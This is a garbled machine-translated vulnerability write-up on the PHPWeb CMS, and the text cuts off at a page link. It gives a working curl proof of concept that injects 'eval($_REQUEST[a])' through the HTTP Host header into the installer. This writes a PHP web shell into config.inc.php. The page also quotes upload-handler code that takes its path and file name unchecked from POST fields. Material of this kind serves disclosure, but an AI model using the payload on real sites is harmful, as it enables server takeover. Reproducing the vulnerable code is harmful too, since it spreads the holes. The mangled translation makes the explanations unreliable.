phpweb finished website to the latest version(inject, upload, write the shell)-vulnerability warning-the black bar safety net


Injection: The reason chicken is the exploit installing the file to re-generate the configuration file write executable code Chicken 1: the destructive action of a very large re-write the configuration file the database connection file Tasteless 2: There is some Safety common sense of the webmasters will delete the install directory Although tasteless, but there are also advantages: not affected by magic_quotes_gpc, the webserver impact Analysis: $siteurl="http://".$ _SERVER["HTTP_HOST"]."/"; //Not filtered $filestr = fread(fopen($SysConfigFile, 'r'),3 0 0 0 0); $filestr=str_replace(" ","",$filestr); $filestr=str_replace("DefaultDbHost",$dbhost,$filestr); $filestr=str_replace("DefaultDbName",$dbname,$filestr); $filestr=str_replace("DefaultDbUser",$dbuser,$filestr); $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr); $filestr=str_replace("DefaultsLan","EN",$filestr); $filestr=str_replace("DefaultTablePre",$tablepre,$filestr); $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr); fwrite(fopen($ConFile,"w"),$filestr,3 0 0 0 0); $_SERVER["HTTP_HOST"] is the http head in the HOST to pass over control,and is not affected by the magic_quotes_gpc effects ^ _ ^ poc: the ? 1 curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#" shell address: /config.inc.php With before phpcms like the need to the remote database ------------------- Upload vulnerability(need feed back) of: Vulnerability file: /kedit/upload_cgi/upload.php This many people know,but very tasteless iis6 analytical or GPC off conditions before they can be used <? php define("ROOTPATH", "../../"); include(ROOTPATH."includes/admin.inc.php"); NeedAuth(0); $dt=date("Ymd",time()); if(! is_dir(ROOTPATH.$ _POST['attachPath'].$ dt)){ @mkdir(ROOTPATH.$ _POST['attachPath'].$ dt,0 7 7 7); } //File to save the directory path $save_path = ROOTPATH.$ _POST['attachPath'].$ dt.'/'; echo $save_path; //File to save the directory URLS $save_url = '../../'.$ _POST['attachPath'].$ dt.'/'; //Define the allowed Upload file extension $ext_arr = array('gif','jpg','png','bmp'); //limit suffix //Maximum file size $max_size = 1 0 0 0 0 0 0; //Change directory permissions @mkdir($save_path, 0 7 7 7); //File full path $file_path = $save_path.$ _POST['fileName']; //save file name //File URL $file_url = $save_url.$ _POST['fileName']; **[1] [[2]](<36563_2.htm>) [next](<36563_2.htm>)**